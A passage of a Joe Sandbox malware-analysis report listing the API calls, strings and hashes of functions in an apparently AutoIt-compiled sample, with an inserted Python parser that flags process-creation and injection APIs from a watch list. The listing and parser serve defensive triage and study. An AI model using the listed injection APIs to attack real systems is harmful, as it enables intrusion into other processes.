                                                            • DestroyIcon.USER32(00000000), ref: 0084C5CF
                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0084C5EC
                                                            • DestroyIcon.USER32(?), ref: 0084C5FB
                                                              • Part of subcall function 0089A71E: DeleteObject.GDI32(00000000), ref: 0089A757
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                             • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                            • String ID:
                                                            • API String ID: 2819616528-0
                                                            • Opcode ID: cd93619ce1ea6741e98088b46d3be41aa3c3fd2c10ca79d3036df51a233ce1f8
                                                            • Instruction ID: a3e88cabdfdea55bbb0f066665949fa4f2caeb637ef91bc8a538778b2cae3592
                                                            • Opcode Fuzzy Hash: cd93619ce1ea6741e98088b46d3be41aa3c3fd2c10ca79d3036df51a233ce1f8
                                                            • Instruction Fuzzy Hash: EF514674601209EFDB24EF68CC45BAA77A9FF58320F104629F906D72A0DB70E9A0DB50
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00868A84,00000B00,?,?), ref: 00868E0C
                                                            • HeapAlloc.KERNEL32(00000000,?,00868A84,00000B00,?,?), ref: 00868E13
                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00868A84,00000B00,?,?), ref: 00868E28
                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,00868A84,00000B00,?,?), ref: 00868E30
                                                            • DuplicateHandle.KERNEL32(00000000,?,00868A84,00000B00,?,?), ref: 00868E33
                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00868A84,00000B00,?,?), ref: 00868E43
                                                            • GetCurrentProcess.KERNEL32(00868A84,00000000,?,00868A84,00000B00,?,?), ref: 00868E4B
                                                            • DuplicateHandle.KERNEL32(00000000,?,00868A84,00000B00,?,?), ref: 00868E4E
                                                            • CreateThread.KERNEL32(00000000,00000000,00868E74,00000000,00000000,00000000), ref: 00868E68
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                             • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                            • String ID:
                                                            • API String ID: 1957940570-0
                                                            • Opcode ID: 32950ff32115fe9eda3eead8cfe875d8a2185cba00afbe2aa7fa413297e43ac6
                                                            • Instruction ID: 45c05386f4aa1c88ab0a78dffffcc70d1e73ac80841a4c76d2eec207b22b6ae6
                                                            • Opcode Fuzzy Hash: 32950ff32115fe9eda3eead8cfe875d8a2185cba00afbe2aa7fa413297e43ac6
                                                            • Instruction Fuzzy Hash: D801A8B5240308FFE611ABA5DC49F6B3BACFB89711F154422FB05DB2A2CA759800CA64
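The records above are Joe Sandbox's per-function summaries: the Windows APIs a disassembled function calls (with "Part of subcall function" marking calls made by a callee), the string literals it references, and the fuzzy-hash identifiers used for similarity matching. Reading thousands of these by hand is slow, so the following added example (editor's code for this page, not Joe Sandbox code) parses the blocks into records and flags the functions that create processes or threads or duplicate handles, such as the CreateProcessW wrapper and the DuplicateHandle/CreateThread function listed above. The SAMPLE text is constructed from three records on this page, trimmed to the lines the parser needs; the regular expressions assume the bullet layout as rendered here, and the PROCESS_APIS watch list is the editor's choice. Because the report identifies the binary as a compiled AutoIt script, these functions are consistent with the AutoIt interpreter's own runtime (Run() and its worker threads), so a hit marks a function worth reading rather than evidence of injection on its own.

```python
"""Parser for the per-function "APIs / Strings / Similarity" blocks that Joe
Sandbox emits for each disassembled function, plus a triage pass that flags
functions calling process- or thread-creation APIs. Added example for this
report page, not Joe Sandbox code; the watch list is the editor's choice and
SAMPLE is constructed from three records on the page, trimmed."""
import re
from dataclasses import dataclass, field
from typing import Optional

# "APIs" bullet: optional subcall prefix, Name.MODULE, optional (args), optional ref.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?"
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-F]+))?\s*$")
# "Strings" bullet: the literal, then ", xrefs: <address>".
STR_RE = re.compile(r"^•\s*(?P<text>.*?),\s*xrefs:\s*(?P<ref>[0-9A-F]+)\s*$")
# "Similarity" bullet: "Key: value" (value may be empty, as for an empty String ID).
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: Optional[str]
    subcall: Optional[str]  # callee address when marked "Part of subcall function"

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)     # (literal, xref address)
    similarity: dict = field(default_factory=dict)  # API ID, String ID, Instruction ID, ...

def parse_report(text):
    """Each "APIs" header starts a new function record; other headers switch section."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":
                rec = FunctionRecord()
                records.append(rec)
            section = line
        elif rec is None or not line:
            continue  # blank line, or text before the first record
        elif section == "APIs" and (m := API_RE.match(line)):
            args = [] if m["args"] is None else [a.strip() for a in m["args"].split(",")]
            rec.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
        elif section == "Strings" and (m := STR_RE.match(line)):
            rec.strings.append((m["text"], m["ref"]))
        elif section == "Similarity" and (m := KV_RE.match(line)):
            rec.similarity[m["key"].strip()] = m["val"].strip()
    return records

# Editor's watch list. In an AutoIt runtime these back Run()/ShellExecute() and the
# interpreter's own worker threads, so a hit marks a function to read, not a verdict.
PROCESS_APIS = {"CreateProcessW", "CreateProcessA", "CreateThread", "CreateRemoteThread",
                "DuplicateHandle", "WriteProcessMemory", "VirtualAllocEx", "NtCreateThreadEx"}

def flag_process_functions(records, watch=PROCESS_APIS):
    """(record index, sorted matching names) for records whose direct calls hit the watch
    list; "Part of subcall function" lines are skipped so a callee is not counted twice."""
    hits = []
    for i, rec in enumerate(records):
        matched = sorted({a.name for a in rec.apis if a.subcall is None} & watch)
        if matched:
            hits.append((i, matched))
    return hits

# Constructed from three records on this page (trimmed); bullets kept as rendered.
SAMPLE = """\
APIs
• _memset.LIBCMT ref: 0088F9C9
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0088FB5C
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0088FD5E
• CloseHandle.KERNEL32(?), ref: 0088FDBF
Memory Dump Source
• Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
Similarity
• API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
• String ID:
• API String ID: 4090791747-0
APIs
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00868A84,00000B00,?,?), ref: 00868E28
• DuplicateHandle.KERNEL32(00000000,?,00868A84,00000B00,?,?), ref: 00868E33
• CreateThread.KERNEL32(00000000,00000000,00868E74,00000000,00000000,00000000), ref: 00868E68
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
APIs
  • Part of subcall function 00867652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0086758C,80070057,?,?,?,0086799D), ref: 0086766F
• CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00889C97
Strings
• NULL Pointer assignment, xrefs: 00889CF0
Similarity
• String ID: NULL Pointer assignment
"""
```

Feed the whole function-listing section to parse_report() and pass the result to flag_process_functions(); on the three sample records it returns the CreateProcessW record and the DuplicateHandle/CreateThread record and leaves the COM record alone. Swap in a different watch set (for example the OLE32 creation calls) to pivot on other behaviour, and cross-reference the "ref" addresses with the memory dump named under Memory Dump Source when you want to read the function itself.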
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                             • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInit$_memset
                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                            • API String ID: 2862541840-625585964
                                                            • Opcode ID: bdc10796d22c6e96566429146a693430e595f487ada23dec8e5bd6e998c0e0f2
                                                            • Instruction ID: b6f49aa18f52d4772353a94ed3d3e7a9d30c3555d975095cb9a41fe0c3224f05
                                                            • Opcode Fuzzy Hash: bdc10796d22c6e96566429146a693430e595f487ada23dec8e5bd6e998c0e0f2
                                                            • Instruction Fuzzy Hash: 0691AF70A00219ABDF24EFA5C844FAEB7B8FF85724F188159F555EB280E7709945CFA0
                                                            APIs
                                                              • Part of subcall function 00867652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0086758C,80070057,?,?,?,0086799D), ref: 0086766F
                                                              • Part of subcall function 00867652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0086758C,80070057,?,?), ref: 0086768A
                                                              • Part of subcall function 00867652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0086758C,80070057,?,?), ref: 00867698
                                                              • Part of subcall function 00867652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0086758C,80070057,?), ref: 008676A8
                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00889B1B
                                                            • _memset.LIBCMT ref: 00889B28
                                                            • _memset.LIBCMT ref: 00889C6B
                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00889C97
                                                            • CoTaskMemFree.OLE32(?), ref: 00889CA2
                                                            Strings
                                                            • NULL Pointer assignment, xrefs: 00889CF0
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                            • String ID: NULL Pointer assignment
                                                            • API String ID: 1300414916-2785691316
                                                            • Opcode ID: 2d5597c184745fa4d9415b8a60912d6c52ab262dae08f44cfa6b98a768c2fbac
                                                            • Instruction ID: 1d619aa8286d3061fcd74aa92b2cb4f97aaba4eb30c4d2ad5abb0670afdfc13b
                                                            • Opcode Fuzzy Hash: 2d5597c184745fa4d9415b8a60912d6c52ab262dae08f44cfa6b98a768c2fbac
                                                            • Instruction Fuzzy Hash: E7912971D00229EBDB10EFA4DC85AEEBBB9FF08710F24415AE519E7281DB715A44CFA1
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00897093
                                                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 008970A7
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 008970C1
                                                            • _wcscat.LIBCMT ref: 0089711C
                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00897133
                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00897161
                                                            Similarity
                                                            • API ID: MessageSend$Window_wcscat
                                                            • String ID: SysListView32
                                                            • API String ID: 307300125-78025650
                                                            • Opcode ID: e1d3842e3ef1a370addffadec106d60260292df31b04d8c969bf8c112c981266
                                                            • Instruction ID: 3ebda62776269db7cbbfcc428f29b3aa83c85e2634321bf666173bedfc068b85
                                                            • Opcode Fuzzy Hash: e1d3842e3ef1a370addffadec106d60260292df31b04d8c969bf8c112c981266
                                                            • Instruction Fuzzy Hash: 2F41A271A14308AFEF21AF64CC85BEE77A8FF08354F14052AFA54E7292D7729D848B50
                                                            APIs
                                                              • Part of subcall function 00873E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00873EB6
                                                              • Part of subcall function 00873E91: Process32FirstW.KERNEL32(00000000,?), ref: 00873EC4
                                                              • Part of subcall function 00873E91: CloseHandle.KERNEL32(00000000), ref: 00873F8E
                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0088ECB8
                                                            • GetLastError.KERNEL32 ref: 0088ECCB
                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0088ECFA
                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 0088ED77
                                                            • GetLastError.KERNEL32(00000000), ref: 0088ED82
                                                            • CloseHandle.KERNEL32(00000000), ref: 0088EDB7
                                                            Similarity
                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                            • String ID: SeDebugPrivilege
                                                            • API String ID: 2533919879-2896544425
                                                            • Opcode ID: 4fbafb7b9dffe863fb52f94684246b6ff2eb98027dcdf2d28b7fee53563504a0
                                                            • Instruction ID: a83d4be8ef57443e73d5d2a5da2c4d6fcf9fd5c948653e020c88292229a18fab
                                                            • Opcode Fuzzy Hash: 4fbafb7b9dffe863fb52f94684246b6ff2eb98027dcdf2d28b7fee53563504a0
                                                            • Instruction Fuzzy Hash: FC41A9712002109FDB14EF28CC95F6EB7A5FF80714F088019F986DB2C2DB74A848CB96
                                                            APIs
                                                            • LoadIconW.USER32(00000000,00007F03), ref: 008732C5
                                                            Similarity
                                                            • API ID: IconLoad
                                                            • String ID: blank$info$question$stop$warning
                                                            • API String ID: 2457776203-404129466
                                                            • Opcode ID: afe0ebc63ab788459efb1a42ba482ef315687ed5980c1173b5d72cc062e00353
                                                            • Instruction ID: 5231599d3e0fec11e95fe50fc2091cdb36b38e5462eb9c77ad52af2dbdd44f61
                                                            • Opcode Fuzzy Hash: afe0ebc63ab788459efb1a42ba482ef315687ed5980c1173b5d72cc062e00353
                                                            • Instruction Fuzzy Hash: 31115B3124835ABA9B055A54DC42DAEB3ACFF19375F10402AF508E6283D675DB0016E7
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0087454E
                                                            • LoadStringW.USER32(00000000), ref: 00874555
                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0087456B
                                                            • LoadStringW.USER32(00000000), ref: 00874572
                                                            • _wprintf.LIBCMT ref: 00874598
                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 008745B6
                                                            Strings
                                                            • %s (%d) : ==> %s: %s %s, xrefs: 00874593
                                                            Similarity
                                                            • API ID: HandleLoadModuleString$Message_wprintf
                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                            • API String ID: 3648134473-3128320259
                                                            • Opcode ID: a1882ad1d2b6e32008ef8219450b3f7e07633bffea71bdd71a0be5aa390e153e
                                                            • Instruction ID: 1c8e1b07d5c1dbbef77bcf2862cf76553ed78525ed05c084e59047809ef1635f
                                                            • Opcode Fuzzy Hash: a1882ad1d2b6e32008ef8219450b3f7e07633bffea71bdd71a0be5aa390e153e
                                                            • Instruction Fuzzy Hash: E00167F3500208BFE715A794DD89EF7776CFB08301F0405A6B749D2152E6749E858B71
                                                            APIs
                                                              • Part of subcall function 00812612: GetWindowLongW.USER32(?,000000EB), ref: 00812623
                                                            • GetSystemMetrics.USER32(0000000F), ref: 0089D78A
                                                            • GetSystemMetrics.USER32(0000000F), ref: 0089D7AA
                                                            • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0089D9E5
                                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0089DA03
                                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0089DA24
                                                            • ShowWindow.USER32(00000003,00000000), ref: 0089DA43
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0089DA68
                                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 0089DA8B
                                                            Similarity
                                                            • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                            • String ID:
                                                            • API String ID: 1211466189-0
                                                            • Opcode ID: 3da68da9381fb6ee8afd91093402d762a22fca6b52f1cb7cf474310a1517a808
                                                            • Instruction ID: 5c177dea7790d74ffdbae2be58c472d110f3d689f56cf6dda2051ac91471434d
                                                            • Opcode Fuzzy Hash: 3da68da9381fb6ee8afd91093402d762a22fca6b52f1cb7cf474310a1517a808
                                                            • Instruction Fuzzy Hash: D8B19931600229AFDF18EF69C9857AD7BF1FF04700F08816AED48DB296D734A960CB54
                                                            APIs
                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0084C417,00000004,00000000,00000000,00000000), ref: 00812ACF
                                                            • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0084C417,00000004,00000000,00000000,00000000,000000FF), ref: 00812B17
                                                            • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0084C417,00000004,00000000,00000000,00000000), ref: 0084C46A
                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0084C417,00000004,00000000,00000000,00000000), ref: 0084C4D6
                                                            Similarity
                                                            • API ID: ShowWindow
                                                            • String ID:
                                                            • API String ID: 1268545403-0
                                                            • Opcode ID: a9455f7eccd81f556f040e6635d124f360fd0f15974409ea77f33c6a5ac61ed4
                                                            • Instruction ID: b20b86966806e631c7cbeef58ce7ba280c8a118b7f03c36f5b3e9c38f2e1a566
                                                            • Opcode Fuzzy Hash: a9455f7eccd81f556f040e6635d124f360fd0f15974409ea77f33c6a5ac61ed4
                                                            • Instruction Fuzzy Hash: F6415930208398ABC7399B288D98BFE7B9EFF55314F18881EE147C6561D635A8E1D720
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 0087737F
                                                              • Part of subcall function 00830FF6: std::exception::exception.LIBCMT ref: 0083102C
                                                              • Part of subcall function 00830FF6: __CxxThrowException@8.LIBCMT ref: 00831041
                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 008773B6
                                                            • EnterCriticalSection.KERNEL32(?), ref: 008773D2
                                                            • _memmove.LIBCMT ref: 00877420
                                                            • _memmove.LIBCMT ref: 0087743D
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0087744C
                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00877461
                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00877480
                                                            Similarity
                                                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 256516436-0
                                                            • Opcode ID: 8e814aae146d5972b31b3c01ca30d5676a087a59b10bd9416e5f54b1376add57
                                                            • Instruction ID: fee27baa9f84088b1a0ccca1c5674c5834ac0255d657b7ddb14bc27795e90537
                                                            • Opcode Fuzzy Hash: 8e814aae146d5972b31b3c01ca30d5676a087a59b10bd9416e5f54b1376add57
                                                            • Instruction Fuzzy Hash: EF317031904205EBCF14EF98DD85AAE7BB8FF84710F1441A6F904EB256DB30DA10CBA5
                                                            APIs
                                                            • DeleteObject.GDI32(00000000), ref: 0089645A
                                                            • GetDC.USER32(00000000), ref: 00896462
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0089646D
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00896479
                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 008964B5
                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 008964C6
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00899299,?,?,000000FF,00000000,?,000000FF,?), ref: 00896500
                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00896520
                                                            Similarity
                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                            • String ID:
                                                            • API String ID: 3864802216-0
                                                            • Opcode ID: 9b9a62d5b34d994ddc32904e74069d363a2f2fad7c455fbda9bbd7004ab8b804
                                                            • Instruction ID: 5d4a269b6747bf65d11237e030fff4e757cfba8bd90b6dd7b13b196ffb7a9533
                                                            • Opcode Fuzzy Hash: 9b9a62d5b34d994ddc32904e74069d363a2f2fad7c455fbda9bbd7004ab8b804
                                                            • Instruction Fuzzy Hash: 7B318B72200210BFEF159F50CC8AFEA3FA9FF09761F080066FE08DA296D6759851CB64
                                                            Similarity
                                                            • API ID: _memcmp
                                                            • String ID:
                                                            • API String ID: 2931989736-0
                                                            • Opcode ID: dd2d9c27993ad5cf6a289a3567dcdfe82b5c28fd15453952b714aad73d5db4f6
                                                            • Instruction ID: c946e7a2cb6bb1c2f57978aee4c2ae3b69e7332dfd77b5d13f59bc890fe6f10b
                                                            • Opcode Fuzzy Hash: dd2d9c27993ad5cf6a289a3567dcdfe82b5c28fd15453952b714aad73d5db4f6
                                                            • Instruction Fuzzy Hash: 7221C261600609BBE620A6299C47FBB339CFF627A8F050020FD46D6783F755DE1182E7
                                                            APIs
                                                              • Part of subcall function 00819997: __itow.LIBCMT ref: 008199C2
                                                              • Part of subcall function 00819997: __swprintf.LIBCMT ref: 00819A0C
                                                              • Part of subcall function 0082FEC6: _wcscpy.LIBCMT ref: 0082FEE9
                                                            • _wcstok.LIBCMT ref: 0087EEFF
                                                            • _wcscpy.LIBCMT ref: 0087EF8E
                                                            • _memset.LIBCMT ref: 0087EFC1
                                                            Similarity
                                                            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                            • String ID: X
                                                            APIs
                                                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00886F14
                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00886F35
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00886F48
                                                            • htons.WSOCK32(?,?,?,00000000,?), ref: 00886FFE
                                                            • inet_ntoa.WSOCK32(?), ref: 00886FBB
                                                              • Part of subcall function 0086AE14: _strlen.LIBCMT ref: 0086AE1E
                                                              • Part of subcall function 0086AE14: _memmove.LIBCMT ref: 0086AE40
                                                            • _strlen.LIBCMT ref: 00887058
                                                            • _memmove.LIBCMT ref: 008870C1
                                                            Similarity
                                                            • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                            APIs
                                                            • IsWindow.USER32(017C4D80), ref: 0089B6A5
                                                            • IsWindowEnabled.USER32(017C4D80), ref: 0089B6B1
                                                            • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0089B795
                                                            • SendMessageW.USER32(017C4D80,000000B0,?,?), ref: 0089B7CC
                                                            • IsDlgButtonChecked.USER32(?,?), ref: 0089B809
                                                            • GetWindowLongW.USER32(017C4D80,000000EC), ref: 0089B82B
                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0089B843
                                                            Similarity
                                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                            APIs
                                                            • _memset.LIBCMT ref: 0088F75C
                                                            • _memset.LIBCMT ref: 0088F825
                                                            • ShellExecuteExW.SHELL32(?), ref: 0088F86A
                                                              • Part of subcall function 00819997: __itow.LIBCMT ref: 008199C2
                                                              • Part of subcall function 00819997: __swprintf.LIBCMT ref: 00819A0C
                                                              • Part of subcall function 0082FEC6: _wcscpy.LIBCMT ref: 0082FEE9
                                                            • GetProcessId.KERNEL32(00000000), ref: 0088F8E1
                                                            • CloseHandle.KERNEL32(00000000), ref: 0088F910
                                                            Similarity
                                                            • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                            • String ID: @
                                                            APIs
                                                            • GetParent.USER32(?), ref: 0087149C
                                                            • GetKeyboardState.USER32(?), ref: 008714B1
                                                            • SetKeyboardState.USER32(?), ref: 00871512
                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 00871540
                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 0087155F
                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 008715A5
                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 008715C8
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            APIs
                                                            • GetParent.USER32(00000000), ref: 008712B5
                                                            • GetKeyboardState.USER32(?), ref: 008712CA
                                                            • SetKeyboardState.USER32(?), ref: 0087132B
                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00871357
                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00871374
                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 008713B8
                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 008713D9
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            Similarity
                                                            • API ID: _wcsncpy$LocalTime
                                                            APIs
                                                              • Part of subcall function 008748AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008738D3,?), ref: 008748C7
                                                              • Part of subcall function 008748AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008738D3,?), ref: 008748E0
                                                            • lstrcmpiW.KERNEL32(?,?), ref: 008738F3
                                                            • _wcscmp.LIBCMT ref: 0087390F
                                                            • MoveFileW.KERNEL32(?,?), ref: 00873927
                                                            • _wcscat.LIBCMT ref: 0087396F
                                                            • SHFileOperationW.SHELL32(?), ref: 008739DB
                                                            Similarity
                                                            • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                            • String ID: \*.*
                                                            APIs
                                                            • _memset.LIBCMT ref: 00897519
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008975C0
                                                            • IsMenu.USER32(?), ref: 008975D8
                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00897620
                                                            • DrawMenuBar.USER32 ref: 00897633
                                                            Similarity
                                                            • API ID: Menu$Item$DrawInfoInsert_memset
                                                            • String ID: 0
                                                            APIs
                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 0089125C
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00891286
                                                            • FreeLibrary.KERNEL32(00000000), ref: 0089133D
                                                              • Part of subcall function 0089122D: RegCloseKey.ADVAPI32(?), ref: 008912A3
                                                              • Part of subcall function 0089122D: FreeLibrary.KERNEL32(?), ref: 008912F5
                                                              • Part of subcall function 0089122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00891318
                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 008912E0
                                                            Similarity
                                                            • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                            APIs
                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 0089655B
                                                            • GetWindowLongW.USER32(017C4D80,000000F0), ref: 0089658E
                                                            • GetWindowLongW.USER32(017C4D80,000000F0), ref: 008965C3
                                                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 008965F5
